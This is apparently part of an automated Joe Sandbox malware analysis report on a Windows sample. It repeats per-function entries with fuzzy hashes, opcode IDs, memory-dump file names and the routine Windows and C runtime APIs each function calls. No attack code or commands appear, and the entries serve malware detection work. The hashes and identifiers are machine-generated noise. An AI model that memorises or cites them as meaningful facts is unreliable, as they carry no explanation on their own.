Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction Fuzzy Hash: 74E0EC60E4D50346FF1BBBB2A8652B893D1AF9BB55B045434D90EC6292FE2CB4968610

Function 00007FF64D3233E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32388C

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: de6ed7916833eab16265dc8adf0133c5cc9bb4ef2c6b2401519f57c94907b3cc
Instruction ID: ef164e06fcd9ab7e78fd40055e4dbe72f1228d1d4b63d292e53fb25f55024037
Opcode Fuzzy Hash: de6ed7916833eab16265dc8adf0133c5cc9bb4ef2c6b2401519f57c94907b3cc
Instruction Fuzzy Hash: 22D1B662F0C68156EF2ABB2595402FDE7A5FB06B88F040439CB5D877A1EF3CE4658742

Function 00007FF64D335294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33551B

Part of subcall function 00007FF64D3413F4: CompareStringW.KERNEL32 ref: 00007FF64D34145A

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
Instruction ID: e82fc7e24c6f628734507cad09c7f04970303efef121e1439447a27ec1308d2b
Opcode Fuzzy Hash: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
Instruction Fuzzy Hash: 61610451E0C64781FA6ABA25861C27EE2D1AF43BE5F144531EE4DC7ED6FE7CE8818200

Function 00007FF64D341870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D33E948: ReleaseSemaphore.KERNEL32 ref: 00007FF64D33E974
Part of subcall function 00007FF64D33E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF64D33E993
Part of subcall function 00007FF64D33E948: DeleteCriticalSection.KERNEL32 ref: 00007FF64D33E9AA
Part of subcall function 00007FF64D33E948: CloseHandle.KERNEL32 ref: 00007FF64D33E9B7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D341ACB

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1624603282-0
Opcode ID: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
Instruction ID: 24c852d4e7b7eb0d016149a9e0adabb9b5b42389d0418b5a0f60e5204577605e
Opcode Fuzzy Hash: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
Instruction Fuzzy Hash: 7A61A062F1AA9592EE09FB65D5540BCB3A5FF42BD0B544232D72D87AC1EF2DE8708300

Function 00007FF64D32EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32EEB8

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
Instruction ID: adb472bcc2ed376ee5559cf6c23884e821b93c5937ba7239acf0ac4029873d69
Opcode Fuzzy Hash: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
Instruction Fuzzy Hash: 8E510562E0C64240FE12BB25D4453E9A791FB87BD8F484136EE4D97796EE3DE485C380

Function 00007FF64D32E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D333EC8: FindClose.KERNELBASE(?,?,00000000,00007FF64D340811), ref: 00007FF64D333EFD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32E993

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
Instruction ID: d51e2829da01510f14a6d9dfb63120bb1bab9c60f5d586f72426f9a47893fd04
Opcode Fuzzy Hash: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
Instruction Fuzzy Hash: 01516122E0C68581FB62FF25D4453BDA3A1FB86B88F440136EA9D977A5EF2CD441C750

Function 00007FF64D331794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33187D

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c006a20c94347bfb99d4e52a49aa348bdad6c5331fec93181297fc91a88f23fb
Instruction ID: 8c41b301c255e55b8750d186229dc140cbedfcfb4bab6330707296e62920d726
Opcode Fuzzy Hash: c006a20c94347bfb99d4e52a49aa348bdad6c5331fec93181297fc91a88f23fb
Instruction Fuzzy Hash: 6D41D662F1CA9142EA15BB17AA40379E291FB45BC0F448535EE5C8BF5AEF3CD8918340

Function 00007FF64D332F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3330C8

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
Instruction ID: de1c9adeb720b2edd4673e6f319218d503c153ff924e58c5ae697ea31b2db13a
Opcode Fuzzy Hash: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
Instruction Fuzzy Hash: 19410762E0CB0581EF12BB25E645379A3A1EB86BD8F145134EA4E87B99EF3DE440C740

Function 00007FF64D35BDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF64D35BE20

Part of subcall function 00007FF64D35BFB0: GetModuleHandleExW.KERNEL32 ref: 00007FF64D35BFD0
Part of subcall function 00007FF64D35BFB0: GetProcAddress.KERNEL32 ref: 00007FF64D35BFE6
Part of subcall function 00007FF64D35BFB0: FreeLibrary.KERNEL32 ref: 00007FF64D35C00B

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction ID: bb990afc0a5d97c2fc3c1844987a0e240e8563d93106f576847dc934eda12070
Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction Fuzzy Hash: 1C41B622E1D602C2FB26FB11B460278A3A1AF56B80F485476EA0DC76E1FF3DE845C741

Function 00007FF64D32129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D321396

Part of subcall function 00007FF64D321F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64D321F89

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: 5eba3157de67c00c95e8addb1899600017969f59a743ef38de321e8ce7b4907f
Instruction ID: ca003f0dadd001ae73c48c7126d99dc2f4db0d9310db86f7fd97feb91e64d91c
Opcode Fuzzy Hash: 5eba3157de67c00c95e8addb1899600017969f59a743ef38de321e8ce7b4907f
Instruction Fuzzy Hash: 8821B522E0C75185EA15BF91A5402B9A291FB06BF4F680B30DF3D87BC1EE7CE9518380

Function 00007FF64D322C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D322D77

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 8c60347c2bfbbab9dfa70ff2fac3311f61486aebf990572e493ef76669a070d3
Instruction ID: b58fa31ea25fe665ff6156e24c58819891a2c5949fd43e23bd475838a12de85a
Opcode Fuzzy Hash: 8c60347c2bfbbab9dfa70ff2fac3311f61486aebf990572e493ef76669a070d3
Instruction Fuzzy Hash: 0B21A226F1D58262EA0AFB21D5543FCA350FB46788F944431E71D87AA2EF3CE4A4C341

Function 00007FF64D323AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D323B6C

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
Instruction ID: fb63ff33e1586cacbde522e388c843f68a6a6357909c5963b479d977056ac58d
Opcode Fuzzy Hash: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
Instruction Fuzzy Hash: F50184A2E1CA8581EE12BB28E84526DB361FF8B794F805235E69C47BA5EF6CD1408705

Function 00007FF64D351558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF64D351604: GetModuleHandleW.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D35162B

DloadProtectSection.DELAYIMP ref: 00007FF64D3515C9

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction ID: a56363b090b1006e3ddaaaaf8bb59dcc613ab3920052eac4df916d5885df5be1
Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction Fuzzy Hash: 36118AA0D0D50781FB67BB55A851374A3E0AF5A38DF140435E90EC66A1FF3CAD95C701

Function 00007FF64D333EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D3340BC: FindFirstFileW.KERNELBASE ref: 00007FF64D33410B
Part of subcall function 00007FF64D3340BC: FindFirstFileW.KERNELBASE ref: 00007FF64D33415E
Part of subcall function 00007FF64D3340BC: GetLastError.KERNEL32 ref: 00007FF64D3341AF

FindClose.KERNELBASE(?,?,00000000,00007FF64D340811), ref: 00007FF64D333EFD

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction ID: 95b45625ce718f715dcb9fae3c64c7cbf9292c7af2c55a51065d43f706051ad4
Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction Fuzzy Hash: 38F0A462D0C24185DE15BB75A2001B9B7609F1BBB4F149334EA3D876D7DE2CD4448744

Function 00007FF64D3320D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF64D33207E), ref: 00007FF64D3320F6

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction ID: caada8bc222815af566ecbd36299d3e64408f6e078dd5b67ada6d2aea4762683
Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction Fuzzy Hash: 55F0AF22E0C68295FB26FB21E241379A660EB16B78F585334E73C855D4EF28D895C300

Function 00007FF64D35D94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF64D35D98A

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction ID: de7c1d971965f48cf931e04887a659cfb386f15967ad82f53b8a71419ab9fcd6
Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction Fuzzy Hash: 93F05855F0D20B85FF2677B168203B592A09F8B7A0F081630DD2EC62C2FE2CB4808210

Function 00007FF64D33273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF64D332755

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
Instruction ID: 761b6b757c6fffc17048506ac34241fae059259afc50b36c8a714b110f3e0de6
Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
Instruction Fuzzy Hash: 00E0C216F2891582EF31FB3ADC426789320FF8EF84B482030DE0C87762EE28C4858A00

Function 00007FF64D332490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF64D3324A2

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction ID: 4daddc2f00995593e563d33394b864b04927792d4ad46072401c38a987bb9c1b
Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction Fuzzy Hash: 56D01216D0D44192DD11F735995203C6350AF97735FA41730D63EC1AE1DE1D9496A311

Function 00007FF64D337FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE ref: 00007FF64D337FD2

Memory Dump Source

